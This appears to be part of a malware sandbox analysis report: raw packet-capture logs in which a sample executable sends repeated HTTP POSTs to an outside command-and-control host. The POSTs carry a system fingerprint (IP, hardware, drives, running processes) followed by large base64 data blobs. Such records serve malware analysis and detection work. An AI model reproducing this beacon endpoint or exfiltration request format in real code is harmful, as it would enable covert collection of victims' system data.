                                                          Data Ascii: \/wA+9Pk\/ebHdI38v91\/rf+Xf\/l0x3qbyU2o7jekv\/LPzf3H\/AF9f\/X7\/AK1W+ST93s+eM\/uv3X+f8\/rPtfOX9fM6Bi\/x7\/kST\/Wnv14\/nz9RQkj4TyX3\/vRF5nSD\/PT\/ADzT9r\/J\/q\/9b\/nv\/npzmmSR\/wAezZ\/00Mvn46+v4\/8A66Pa+cv6+YDNqRyb0+cf62X\/AKbfp\/XHfrS7v3bhPM3x
                                                          Dec 20, 2024 16:44:44.854197979 CET4944OUTData Raw: 4d 38 64 2b 49 6f 34 6e 6b 61 47 36 38 54 36 72 34 6d 38 58 61 5a 71 65 6f 78 52 4d 78 57 33 66 55 49 39 46 74 4c 75 37 6a 69 77 6b 32 6f 53 33 64 34 52 35 74 31 49 54 2b 6d 65 6c 5c 2f 74 33 5c 2f 41 4c 4b 64 75 45 45 5c 2f 78 55 32 62 63 5c 2f
                                                          Data Ascii: M8d+Io4nkaG68T6r4m8XaZqeoxRMxW3fUI9FtLu7jiwk2oS3d4R5t1IT+mel\/t3\/ALKduEE\/xU2bc\/8AMj\/EduOf7vhBq\/K79vz4x\/D742fGXwz4n+GOu\/8ACS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4
                                                          Dec 20, 2024 16:44:44.854295015 CET4944OUTData Raw: 49 73 61 62 30 6b 6d 54 5c 2f 57 2b 2b 66 58 72 36 66 35 50 66 50 32 66 6e 2b 48 5c 2f 41 41 53 2b 64 2b 58 39 66 4d 68 6b 5a 32 4c 75 37 37 42 5c 2f 71 5c 2f 38 41 56 57 32 66 38 5c 2f 70 5c 2f 56 6d 33 64 76 64 30 38 6c 35 50 38 5c 2f 54 76 6a
                                                          Data Ascii: Isab0kmT\/W++fXr6f5PfP2fn+H\/AAS+d+X9fMhkZ2Lu77B\/q\/8AVW2f8\/p\/Vm3dvd08l5P8\/Tvjn+lPSMbX\/cx7Mfx\/Ti1\/6\/u9Mkz5j\/8AtP8AcQen19+tZmoyPZ5h353\/AOql\/wDkr8P6UwSFvnR8v\/zz\/wCnfHpnr0p+5PnR3+SX7P8A8tf\/ACa\/p1qH5137E8v93\/q4\/wDlt\/pXf9P880HQQyN
                                                          Dec 20, 2024 16:44:44.973922968 CET14832OUTData Raw: 2b 58 35 70 4f 68 44 6c 6e 4a 38 36 79 5c 2f 4e 4d 76 78 65 71 53 64 4c 46 55 33 46 74 71 61 6a 75 55 31 5c 2f 75 6e 38 50 35 69 6f 4c 32 36 6a 73 62 4f 37 76 5a 75 49 62 4f 32 6e 75 70 54 6e 48 37 75 33 69 65 56 2b 54 77 50 6c 51 38 6e 70 56 72
                                                          Data Ascii: +X5pOhDlnJ86y\/NMvxeqSdLFU3FtqajuU1\/un8P5ioL26jsbO7vZuIbO2nupTnH7u3ieV+TwPlQ8npVrVbW70C31bVfEWq+DNA8M6Z8NvhB8QIPFGqa5r8eka\/q\/x38D2HxF+GXwk8MiDwdcX+ufFrWvCV7Lq9\/ollZP4Z8Nadpuo634l8X6R4cjttaur4g4w4Z4WqZfS4gzjCZXVzWs8NltLEOp7THYm8IrD4aFOnUlVx
                                                          Dec 20, 2024 16:44:45.018131971 CET27192OUTData Raw: 41 78 54 78 65 5a 30 63 56 48 44 59 76 4c 73 74 71 35 62 53 77 43 77 47 47 6a 54 73 4e 38 75 63 39 76 53 76 6c 48 34 37 65 49 37 72 54 50 32 62 50 32 70 66 32 65 50 44 39 39 61 32 48 69 7a 34 77 65 4e 76 68 68 5c 2f 77 67 55 53 36 44 34 68 75 4e
                                                          Data Ascii: AxTxeZ0cVHDYvLstq5bSwCwGGjTsN8uc9vSvlH47eI7rTP2bP2pf2ePD99a2Hiz4weNvhh\/wgUS6D4huNYHwv8aaTrWp\/tV6BpPiqysrrRvDmjeL9d+Ef7MDeI9Lvb7S9Q8RQ6CLbTlv7CTxNbt9aMm\/1\/LPFUZtLsLmVZrizs55kBCyzWsMsqgjBCyOjOARwQDyOOlfr\/iv4Z5V4scKf6qZvXqYXCvNsmzOWIoQhKu4ZT
                                                          Dec 20, 2024 16:44:45.134721041 CET7416OUTData Raw: 2f 4f 76 70 32 34 6c 79 34 42 50 47 34 5a 5c 2f 50 38 41 7a 6a 74 6a 72 30 72 35 44 74 64 51 62 56 64 54 76 39 54 64 42 47 32 6f 33 39 31 66 4e 47 43 53 49 32 75 72 71 57 63 6f 70 4a 4a 4b 6f 5a 43 6f 4a 35 49 41 7a 58 5c 2f 43 31 78 66 69 76 61
                                                          Data Ascii: /Ovp24ly4BPG4Z\/P8Azjtjr0r5DtdQbVdTv9TdBG2o391fNGCSI2urqWcopJJKoZCoJ5IAzX\/C1xfivaU8PC+rxE5pW6QpqMn02dSG+79D\/t4yek4e0dtPZxj03lLR+vut\/JXtc9b0d87CT2GT2PH\/ANbmv56\/27fhVH8LP2hfEht9VbVLb4kRXPxWhWSERTaZJ4u8SeIl1DSpWUlJ1t9W02\/ltJkVD9gntIpQ08Usj\
                                                          Dec 20, 2024 16:44:45.302124023 CET1236OUTData Raw: 31 55 71 30 36 58 37 79 55 55 71 62 54 55 64 64 54 5c 2f 4e 58 77 62 34 37 77 6e 68 6c 34 6f 63 46 63 66 59 5c 2f 41 59 6e 4d 38 48 77 74 6e 4e 4c 4e 4d 52 67 4d 4a 55 70 55 63 54 69 71 64 4f 6a 57 70 75 6c 52 71 56 6b 36 55 4a 74 31 55 30 35 72
                                                          Data Ascii: 1Uq06X7yUUqbTUddT\/NXwb47wnhl4ocFcfY\/AYnM8HwtnNLNMRgMJUpUcTiqdOjWpulRqVk6UJt1U05rl0aZ+jv7FP\/AATw+OX7QHxW8Tfte\/tL+OfFnhn48fCr9rjwfeXXg\/XdHmuG1O9+FXivwZ4y8Wx6xcXZDpoereHp7XRPhmPDkq6Hp+n2un39vLqHh2awtY\/xl\/4Km\/s7+MPiF\/wUI\/ar8X6VPGthqvxPuU
                                                          Dec 20, 2024 16:44:45.510202885 CET1236OUTData Raw: 53 72 5a 4c 77 6e 6c 4f 52 35 58 6a 4d 79 70 30 4b 74 62 44 30 4d 78 78 6d 44 72 34 32 68 68 71 39 66 44 30 63 52 43 6a 58 72 51 6e 48 54 4e 70 5c 2f 76 48 5c 2f 50 34 30 2b 72 2b 6a 36 54 72 58 69 54 58 4e 4b 38 4c 2b 46 39 41 38 52 65 4c 50 46
                                                          Data Ascii: SrZLwnlOR5XjMyp0KtbD0MxxmDr42hhq9fD0cRCjXrQnHTNp\/vH\/P40+r+j6TrXiTXNK8L+F9A8ReLPFGuyXUOh+F\/CXh\/WvFXiXWprKyn1G8i0nw\/4fsdS1fUpLTT7W6vrhLOymaGztri5kCwwyOv7tiMRQwlCricVWo4bDUKc6tfEYipCjQo0oJynVq1ako06dOEU5TnOSjFJttI\/jrC0MXjsRRweCw1bF4vE1I0cPh


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.549733185.121.15.192803148C:\Users\user\Desktop\5ZH9uXmzGP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:44:46.490637064 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 500630
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                          Dec 20, 2024 16:44:46.611917019 CET2472OUTData Raw: 68 70 34 5a 39 66 2b 69 75 38 7a 2b 72 66 2b 4b 63 33 6a 64 5c 2f 30 56 50 68 58 5c 2f 77 43 48 76 69 37 5c 2f 41 4f 67 63 5c 2f 6c 47 71 4f 54 74 2b 50 39 4b 5c 2f 63 62 39 70 33 5c 2f 67 6c 72 6f 4f 67 36 42 38 53 64 57 5c 2f 5a 32 6c 38 52 61
                                                          Data Ascii: hp4Z9f+iu8z+rf+Kc3jd\/0VPhX\/wCHvi7\/AOgc\/lGqOTt+P9K\/cb9p3\/glroOg6B8SdW\/Z2l8Ralqnwx8W22nXXhbxDqMer6t4k8P3fw38A+MJp9OuYLOwhfWdP1HxJqixWMVnF9v05beCEPqFsBqH4hzwT2s8ttcwyQXEEjxTQyo0csUsbFXjkRgGV1YEMpAIIr938K\/GXgrxgy3F4\/hTEYyjiMvreyzHJc3pYbC5
                                                          Dec 20, 2024 16:44:46.611963987 CET2472OUTData Raw: 66 58 35 66 71 56 6a 73 38 78 33 48 5c 2f 62 4f 53 4d 63 2b 5c 2f 38 41 6e 36 66 53 6d 78 62 35 50 4a 5c 2f 67 54 5c 2f 70 6e 78 5c 2f 6e 50 2b 65 4b 6c 62 4d 6d 39 50 5c 2f 49 66 2b 50 31 5c 2f 7a 78 55 4f 50 34 50 34 5c 2f 4b 38 71 58 39 31 5c
                                                          Data Ascii: fX5fqVjs8x3H\/bOSMc+\/8An6fSmxb5PJ\/gT\/pnx\/nP+eKlbMm9P\/If+P1\/zxUOP4P4\/K8qX91\/y7\/56emK6DQh8zd\/tiSL979o\/wA\/4e1Cxz7d4+fzP3Uo\/wCW\/wDnjt\/OnybCET+OOXny\/wAvT\/P40+TO13f5H\/6Zxf4\/j70HQU2j52b4\/r\/n9OvaoWLybEz+Plf4f5+tXJo\/3mznZ5Xm\/wCOO
                                                          Dec 20, 2024 16:44:46.612021923 CET2472OUTData Raw: 66 36 5a 63 6d 65 78 76 62 5a 35 74 51 75 56 45 4e 31 62 50 41 37 4a 4c 6d 4a 6a 76 64 5c 2f 66 64 65 2b 46 76 77 30 38 53 2b 5a 4a 65 2b 46 6c 30 53 2b 6b 33 75 32 70 65 44 62 70 64 41 61 53 56 75 49 5c 2f 4f 30 61 57 32 31 4c 77 79 6c 72 46 31
                                                          Data Ascii: f6ZcmexvbZ5tQuVEN1bPA7JLmJjvd\/fde+Fvw08S+ZJe+Fl0S+k3u2peDbpdAaSVuI\/O0aW21LwylrF1NtpOi6NLLjBvEJLV8G\/sbeOtO8IeC\/jJqGtG5\/snwtBoviu8FskckyWC2usRapcRJLJBGzW0Gn28rxmcSzINltHLKNj+ceKPjd+0jLq\/wAQf2gvhd4\/07XvgJYzWltp\/h\/UvD0JTT7+3u9C02TwzqGhyxT
                                                          Dec 20, 2024 16:44:46.612323046 CET2472OUTData Raw: 54 33 4d 33 39 4c 50 6a 54 34 69 65 44 5c 2f 41 49 74 61 78 2b 77 44 38 53 66 68 5c 2f 72 56 72 34 69 38 47 65 4e 50 6a 39 72 76 69 44 77 39 72 46 70 75 45 64 33 59 58 33 37 47 6e 37 57 54 6f 4a 49 70 41 73 31 70 65 57 30 6e 6d 57 6d 6f 57 46 79
                                                          Data Ascii: T3M39LPjT4ieD\/AItax+wD8Sfh\/rVr4i8GeNPj9rviDw9rFpuEd3YX37Gn7WToJIpAs1peW0nmWmoWFykV5p9\/Bc2N5DDdW80Sfzu\/8FYMt+3J8Vcc7dG+GS\/T\/i2fhNv\/AGav2L6LWFp4Hxs4c9llccjxGN4I4o\/tTLaU8yUaeMwed5rl1SnVpZnjMZi6U4LLMMq1CrWcaeIpOSp05aL+dfppYqeO+j3xP7XM3ntDB
                                                          Dec 20, 2024 16:44:46.612395048 CET4944OUTData Raw: 50 38 41 51 30 39 6c 37 45 66 35 39 52 55 63 6e 62 38 66 36 55 48 51 52 31 48 35 66 76 38 41 70 5c 2f 38 41 58 71 53 69 67 31 68 74 38 5c 2f 30 52 56 5a 64 33 34 56 44 5c 2f 41 4f 67 66 35 5c 2f 44 70 5c 2f 6e 46 58 50 4c 39 5c 2f 30 5c 2f 38 41
                                                          Data Ascii: P8AQ09l7Ef59RUcnb8f6UHQR1H5fv8Ap\/8AXqSig1ht8\/0RVZd34VD\/AOgf5\/Dp\/nFXPL9\/0\/8Ar1WaP2+T+QH+eMZ96Dp9\/wDu\/iQyLj7\/APy09e2P8\/ln0qIb\/wCPPtn\/ADj06VYl\/i\/D+lR+X7\/p\/wDXoNqfX5fqR1A3fZ\/n\/Pv39qssu33FQydvx\/pQdhQ+f5+Pv9enQf59uaXd\/wAs+3\/1vp
                                                          Dec 20, 2024 16:44:46.613687992 CET2472OUTData Raw: 4d 38 64 2b 49 6f 34 6e 6b 61 47 36 38 54 36 72 34 6d 38 58 61 5a 71 65 6f 78 52 4d 78 57 33 66 55 49 39 46 74 4c 75 37 6a 69 77 6b 32 6f 53 33 64 34 52 35 74 31 49 54 2b 6d 65 6c 5c 2f 74 33 5c 2f 41 4c 4b 64 75 45 45 5c 2f 78 55 32 62 63 5c 2f
                                                          Data Ascii: M8d+Io4nkaG68T6r4m8XaZqeoxRMxW3fUI9FtLu7jiwk2oS3d4R5t1IT+mel\/t3\/ALKduEE\/xU2bc\/8AMj\/EduOf7vhBq\/K79vz4x\/D742fGXwz4n+GOu\/8ACS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4
                                                          Dec 20, 2024 16:44:46.613845110 CET4944OUTData Raw: 4f 4a 4b 32 44 77 4d 36 38 63 46 53 78 57 4a 64 47 72 48 2b 6b 4d 44 77 62 6e 4e 48 4e 63 34 7a 44 68 66 77 74 78 76 42 48 46 50 45 6c 48 4d 38 46 6a 2b 4b 38 39 34 79 79 7a 50 4f 47 75 48 4b 65 65 34 71 6e 6a 63 2b 7a 44 68 66 4a 63 75 7a 33 4d
                                                          Data Ascii: OJK2DwM68cFSxWJdGrH+kMDwbnNHNc4zDhfwtxvBHFPElHM8Fj+K894yyzPOGuHKee4qnjc+zDhfJcuz3MMXWxmNxdNY6nhf7D4boYvHwoSxtbC4ZVqMvzo\/as+Cmufs7\/APBIf9mr4Q+KIzb+J\/DvxI8J6j4lsWkSV9K8ReNNP+MHjzXNFeWMvFLJouq+JLvSZJIXkt5Hs2a3lkhMbt+DWw+3+fwr+p7\/AILRnH7JHhgf3
                                                          Dec 20, 2024 16:44:46.615166903 CET2472OUTData Raw: 30 52 74 52 6d 30 2b 44 56 62 36 47 77 58 55 64 51 67 61 38 6c 73 39 4d 76 37 71 4f 33 45 6a 32 39 6e 63 79 68 49 48 35 58 51 66 69 42 34 5a 31 36 4b 37 61 44 57 4e 47 57 57 7a 31 6a 56 4e 44 6c 6a 54 56 62 64 31 6c 76 64 49 75 6d 74 4c 6f 32 76
                                                          Data Ascii: 0RtRm0+DVb6GwXUdQga8ls9Mv7qO3Ej29ncyhIH5XQfiB4Z16K7aDWNGWWz1jVNDljTVbd1lvdIumtLo2vnra3EsJlQmJntYZChUvFGxKD8Rwvg39HbB8XclDg\/hP\/AFkrYOWaRyutPE4rAfU6denQliqGQ4rFVsgpRhXqUqf7jAQnCU4WilKLf9GYzx9+lTmHArliOPuOv9UcNj6eTVM5w9PC4LM\/r+Jw2IxNPBYnibB4LD
                                                          Dec 20, 2024 16:44:46.731858969 CET4944OUTData Raw: 2b 58 35 70 4f 68 44 6c 6e 4a 38 36 79 5c 2f 4e 4d 76 78 65 71 53 64 4c 46 55 33 46 74 71 61 6a 75 55 31 5c 2f 75 6e 38 50 35 69 6f 4c 32 36 6a 73 62 4f 37 76 5a 75 49 62 4f 32 6e 75 70 54 6e 48 37 75 33 69 65 56 2b 54 77 50 6c 51 38 6e 70 56 72
                                                          Data Ascii: +X5pOhDlnJ86y\/NMvxeqSdLFU3FtqajuU1\/un8P5ioL26jsbO7vZuIbO2nupTnH7u3ieV+TwPlQ8npVrVbW70C31bVfEWq+DNA8M6Z8NvhB8QIPFGqa5r8eka\/q\/x38D2HxF+GXwk8MiDwdcX+ufFrWvCV7Lq9\/ollZP4Z8Nadpuo634l8X6R4cjttaur4g4w4Z4WqZfS4gzjCZXVzWs8NltLEOp7THYm8IrD4aFOnUlVx
                                                          Dec 20, 2024 16:44:46.731914997 CET2472OUTData Raw: 78 4f 67 48 36 5c 2f 68 5c 2f 55 31 58 66 72 2b 46 53 31 42 4a 5c 2f 77 42 38 66 35 5c 2f 7a 37 2b 39 42 30 46 64 67 5c 2f 77 44 63 2b 54 5c 2f 70 6e 6e 31 39 76 77 5c 2f 7a 6d 6d 4e 6e 76 36 6a 70 5c 2f 72 2b 6e 62 33 71 77 6e 33 52 2b 50 38 7a
                                                          Data Ascii: xOgH6\/h\/U1Xfr+FS1BJ\/wB8f5\/z7+9B0Fdg\/wDc+T\/pnn19vw\/zmmNnv6jp\/r+nb3qwn3R+P8zUUkf9\/wD7a\/569z\/kCg0+s\/1b\/wC1Gbj\/AL57\/wD18fpVaSP5vub383\/nr+nf\/Hp2qz93Zv8An4\/1kf8AqP8AI\/Ombfmf+NP8\/n+ff35Dpht8\/wBEU\/nXYj+nP+PaoV\/jznzP+mn+fXP\/AOqr


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.549734185.121.15.192803148C:\Users\user\Desktop\5ZH9uXmzGP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 20, 2024 16:44:48.303504944 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 500630
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                          Dec 20, 2024 16:44:48.423373938 CET2472OUTData Raw: 68 70 34 5a 39 66 2b 69 75 38 7a 2b 72 66 2b 4b 63 33 6a 64 5c 2f 30 56 50 68 58 5c 2f 77 43 48 76 69 37 5c 2f 41 4f 67 63 5c 2f 6c 47 71 4f 54 74 2b 50 39 4b 5c 2f 63 62 39 70 33 5c 2f 67 6c 72 6f 4f 67 36 42 38 53 64 57 5c 2f 5a 32 6c 38 52 61
                                                          Data Ascii: hp4Z9f+iu8z+rf+Kc3jd\/0VPhX\/wCHvi7\/AOgc\/lGqOTt+P9K\/cb9p3\/glroOg6B8SdW\/Z2l8Ralqnwx8W22nXXhbxDqMer6t4k8P3fw38A+MJp9OuYLOwhfWdP1HxJqixWMVnF9v05beCEPqFsBqH4hzwT2s8ttcwyQXEEjxTQyo0csUsbFXjkRgGV1YEMpAIIr938K\/GXgrxgy3F4\/hTEYyjiMvreyzHJc3pYbC5
                                                          Dec 20, 2024 16:44:48.423413992 CET2472OUTData Raw: 66 58 35 66 71 56 6a 73 38 78 33 48 5c 2f 62 4f 53 4d 63 2b 5c 2f 38 41 6e 36 66 53 6d 78 62 35 50 4a 5c 2f 67 54 5c 2f 70 6e 78 5c 2f 6e 50 2b 65 4b 6c 62 4d 6d 39 50 5c 2f 49 66 2b 50 31 5c 2f 7a 78 55 4f 50 34 50 34 5c 2f 4b 38 71 58 39 31 5c
                                                          Data Ascii: fX5fqVjs8x3H\/bOSMc+\/8An6fSmxb5PJ\/gT\/pnx\/nP+eKlbMm9P\/If+P1\/zxUOP4P4\/K8qX91\/y7\/56emK6DQh8zd\/tiSL979o\/wA\/4e1Cxz7d4+fzP3Uo\/wCW\/wDnjt\/OnybCET+OOXny\/wAvT\/P40+TO13f5H\/6Zxf4\/j70HQU2j52b4\/r\/n9OvaoWLybEz+Plf4f5+tXJo\/3mznZ5Xm\/wCOO
                                                          Dec 20, 2024 16:44:48.423439026 CET4944OUTData Raw: 66 36 5a 63 6d 65 78 76 62 5a 35 74 51 75 56 45 4e 31 62 50 41 37 4a 4c 6d 4a 6a 76 64 5c 2f 66 64 65 2b 46 76 77 30 38 53 2b 5a 4a 65 2b 46 6c 30 53 2b 6b 33 75 32 70 65 44 62 70 64 41 61 53 56 75 49 5c 2f 4f 30 61 57 32 31 4c 77 79 6c 72 46 31
                                                          Data Ascii: f6ZcmexvbZ5tQuVEN1bPA7JLmJjvd\/fde+Fvw08S+ZJe+Fl0S+k3u2peDbpdAaSVuI\/O0aW21LwylrF1NtpOi6NLLjBvEJLV8G\/sbeOtO8IeC\/jJqGtG5\/snwtBoviu8FskckyWC2usRapcRJLJBGzW0Gn28rxmcSzINltHLKNj+ceKPjd+0jLq\/wAQf2gvhd4\/07XvgJYzWltp\/h\/UvD0JTT7+3u9C02TwzqGhyxT
                                                          Dec 20, 2024 16:44:48.423491955 CET2472OUTData Raw: 50 38 41 51 30 39 6c 37 45 66 35 39 52 55 63 6e 62 38 66 36 55 48 51 52 31 48 35 66 76 38 41 70 5c 2f 38 41 58 71 53 69 67 31 68 74 38 5c 2f 30 52 56 5a 64 33 34 56 44 5c 2f 41 4f 67 66 35 5c 2f 44 70 5c 2f 6e 46 58 50 4c 39 5c 2f 30 5c 2f 38 41
                                                          Data Ascii: P8AQ09l7Ef59RUcnb8f6UHQR1H5fv8Ap\/8AXqSig1ht8\/0RVZd34VD\/AOgf5\/Dp\/nFXPL9\/0\/8Ar1WaP2+T+QH+eMZ96Dp9\/wDu\/iQyLj7\/APy09e2P8\/ln0qIb\/wCPPtn\/ADj06VYl\/i\/D+lR+X7\/p\/wDXoNqfX5fqR1A3fZ\/n\/Pv39qssu33FQydvx\/pQdhQ+f5+Pv9enQf59uaXd\/wAs+3\/1vp
                                                          Dec 20, 2024 16:44:48.423574924 CET2472OUTData Raw: 5c 2f 77 41 2b 39 50 6b 5c 2f 65 62 48 64 49 33 38 76 39 31 5c 2f 72 66 2b 58 66 5c 2f 6c 30 78 33 71 62 79 55 32 6f 37 6a 65 6b 76 5c 2f 4c 50 7a 66 33 48 5c 2f 41 46 39 66 5c 2f 58 37 5c 2f 41 4b 31 57 2b 53 54 39 33 73 2b 65 4d 5c 2f 75 76 33
                                                          Data Ascii: \/wA+9Pk\/ebHdI38v91\/rf+Xf\/l0x3qbyU2o7jekv\/LPzf3H\/AF9f\/X7\/AK1W+ST93s+eM\/uv3X+f8\/rPtfOX9fM6Bi\/x7\/kST\/Wnv14\/nz9RQkj4TyX3\/vRF5nSD\/PT\/ADzT9r\/J\/q\/9b\/nv\/npzmmSR\/wAezZ\/00Mvn46+v4\/8A66Pa+cv6+YDNqRyb0+cf62X\/AKbfp\/XHfrS7v3bhPM3x
                                                          Dec 20, 2024 16:44:48.423712015 CET4944OUTData Raw: 4d 38 64 2b 49 6f 34 6e 6b 61 47 36 38 54 36 72 34 6d 38 58 61 5a 71 65 6f 78 52 4d 78 57 33 66 55 49 39 46 74 4c 75 37 6a 69 77 6b 32 6f 53 33 64 34 52 35 74 31 49 54 2b 6d 65 6c 5c 2f 74 33 5c 2f 41 4c 4b 64 75 45 45 5c 2f 78 55 32 62 63 5c 2f
                                                          Data Ascii: M8d+Io4nkaG68T6r4m8XaZqeoxRMxW3fUI9FtLu7jiwk2oS3d4R5t1IT+mel\/t3\/ALKduEE\/xU2bc\/8AMj\/EduOf7vhBq\/K79vz4x\/D742fGXwz4n+GOu\/8ACS+HdN+GGieHrzUzpet6N5etWvinxnqVzZLZ6\/pml30ghstW06U3KWxtXNwY45nkhmVP9KP2Wvg99IDwz+k5TzHjLwp8YeAeEcz4G4oy\/N8w4n4E4
                                                          Dec 20, 2024 16:44:48.423724890 CET1236OUTData Raw: 49 73 61 62 30 6b 6d 54 5c 2f 57 2b 2b 66 58 72 36 66 35 50 66 50 32 66 6e 2b 48 5c 2f 41 41 53 2b 64 2b 58 39 66 4d 68 6b 5a 32 4c 75 37 37 42 5c 2f 71 5c 2f 38 41 56 57 32 66 38 5c 2f 70 5c 2f 56 6d 33 64 76 64 30 38 6c 35 50 38 5c 2f 54 76 6a
                                                          Data Ascii: Isab0kmT\/W++fXr6f5PfP2fn+H\/AAS+d+X9fMhkZ2Lu77B\/q\/8AVW2f8\/p\/Vm3dvd08l5P8\/Tvjn+lPSMbX\/cx7Mfx\/Ti1\/6\/u9Mkz5j\/8AtP8AcQen19+tZmoyPZ5h353\/AOql\/wDkr8P6UwSFvnR8v\/zz\/wCnfHpnr0p+5PnR3+SX7P8A8tf\/ACa\/p1qH5137E8v93\/q4\/wDlt\/pXf9P880HQQyN
                                                          Dec 20, 2024 16:44:48.423732996 CET3708OUTData Raw: 2b 71 48 79 5c 2f 4d 5c 2f 76 5c 2f 38 41 62 4c 5c 2f 55 38 66 35 5c 2f 4d 30 39 66 39 79 54 33 38 7a 39 78 5c 2f 6e 67 2b 33 4e 48 79 79 4e 4d 37 70 76 66 7a 66 33 58 2b 65 33 2b 65 42 57 5a 30 44 50 4c 64 66 4f 5c 2f 76 78 5c 2f 38 41 54 4c 39
